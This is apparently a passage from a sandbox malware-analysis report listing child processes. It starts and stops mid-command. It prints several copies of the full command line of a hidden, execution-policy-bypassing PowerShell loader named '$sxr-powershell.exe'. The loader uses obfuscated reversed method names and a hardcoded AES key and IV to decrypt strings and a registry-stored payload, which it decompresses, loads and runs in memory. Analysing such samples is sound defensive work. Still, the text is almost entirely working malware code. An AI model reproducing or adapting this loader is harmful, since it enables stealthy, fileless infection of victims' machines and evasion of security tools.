$IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
- Executes dropped EXE
PID:4368

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:4120

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:1916

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('G/j1UyVuWVLkONhVTV7UGAb0buavSZnXzC8N/ybdX47f37JNz11yQo78ioiSjDGt+SKNfpjKrgqerIig4u27+IM/r0RlqLI8KyhPDDG2JsaU/RPQVYfFKZLqfQkLpClUd7e8YrijBu2ZR5M/SGLaXuqIYAGyqNLG82LuwyD/BwSp3QxF4qL6tfdQhLYdB0s+kJy+dKlksNaRpdk8DVXK6DYqbqlF2JZ8s6XawhjUPUWK5RcH4qVETNvJkIP9KnuwAZezWhHR50GUN37srEpEC6R2YmckmoY/OvSxSrZ0xTpYk9hw5YE/oLjlh5SAr7r0JutSb2B/vxZy6ueGswMyvabHustF6ViBCgxPbcvdp/ChFw0J0+7ckb4TpJkA/LE575/mSgKPWnqwduG9OdpUgdnDUYxbbrE7NnJKhf4N9mE=');$dHUnA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dHUnA, 0, $dHUnA.Length);$dHUnA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($dHUnA);$XIjgA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oaNzpE4XcEVHbcUwG0kf5A==');$XIjgA = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XIjgA, 0, $XIjgA.Length);$XIjgA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XIjgA);$ZiATm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vR2jKV8WZ/w6qkVXDGyXeA==');$ZiATm = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZiATm, 0, $ZiATm.Length);$ZiATm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZiATm);$yTemZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6yGizSo/R7vdodR0NDP7mA==');$yTemZ = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($yTemZ, 0, $yTemZ.Length);$yTemZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($yTemZ);$IgEqc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uzvi7i/DzE7DeWIJ2N1ZFA==');$IgEqc = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IgEqc, 0, $IgEqc.Length);$IgEqc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IgEqc);$rruSG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sU+qCTuVJ33RG/fWqLIbkA==');$rruSG = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($rruSG, 0, $rruSG.Length);$rruSG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($rruSG);$tagqY0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CmzcSesKmuZCi9P/dkHwMQ==');$tagqY0 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY0, 0, $tagqY0.Length);$tagqY0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY0);$tagqY1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('InjIvNLletDRj5mJPHa4yA==');$tagqY1 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY1, 0, $tagqY1.Length);$tagqY1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY1);$tagqY2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('htBQz3KYDcinqLlq2xKUnA==');$tagqY2 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY2, 0, $tagqY2.Length);$tagqY2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY2);$tagqY3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MHWBRZszc3VVpAvjONe/Wg==');$tagqY3 = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY3, 0, $tagqY3.Length);$tagqY3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY3);$XdDki.Dispose();$pipZR1.Dispose();$AJZmu = [Microsoft.Win32.Registry]::$IgEqc.$yTemZ($tagqY).$ZiATm($xIjmq);$DfRTn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($AJZmu);$pipZR = New-Object System.Security.Cryptography.AesManaged;$pipZR.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$FnrzO = $pipZR.('rotpyrceDetaerC'[-1..-15] -join '')();$DfRTn = $FnrzO.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DfRTn, 0, $DfRTn.Length);$FnrzO.Dispose();$pipZR.Dispose();$GUtCq = New-Object System.IO.MemoryStream(, $DfRTn);$opLWn = New-Object System.IO.MemoryStream;$RfNsM = New-Object System.IO.Compression.GZipStream($GUtCq, [IO.Compression.CompressionMode]::$tagqY1);$RfNsM.$rruSG($opLWn);$RfNsM.Dispose();$GUtCq.Dispose();$opLWn.Dispose();$DfRTn = $opLWn.ToArray();$SHskK = $dHUnA | IEX;$jcubt = $SHskK::$tagqY2($DfRTn);$boBJt = $jcubt.EntryPoint;$boBJt.$tagqY0($null, (, [string[]] ($gPqLf)))
4⤵
PID:4648

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1616).WaitForExit();[System.Threading.Thread]::Sleep(5000); $pipZR1 = New-Object System.Security.Cryptography.AesManaged;$pipZR1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$pipZR1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$pipZR1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aNJzU0Wh7kY9rwzBT78oJ1wiloTq/+RRntIBAfDfENg=');$pipZR1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('S6Pq+md1iAIgVNcHsxgM8w==');$XdDki = $pipZR1.('rotpyrceDetaerC'[-1..-15] -join '')();$tagqY = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5ustVY8Pqgcg1xlNi8JTVg==');$tagqY = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tagqY, 0, $tagqY.Length);$tagqY = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tagqY);$xIjmq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wHPva9FzqB309fr6XnRPr7I62/D5SEcAeyEieU2SaJ4=');$xIjmq = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($xIjmq, 0, $xIjmq.Length);$xIjmq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($xIjmq);$gPqLf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fR/Q0c/Mb9uImXigsnEjQ==');$gPqLf = $XdDki.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gPqLf, 0, $gPqLf.Length);$gPqLf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gPqLf);$dHUnA = 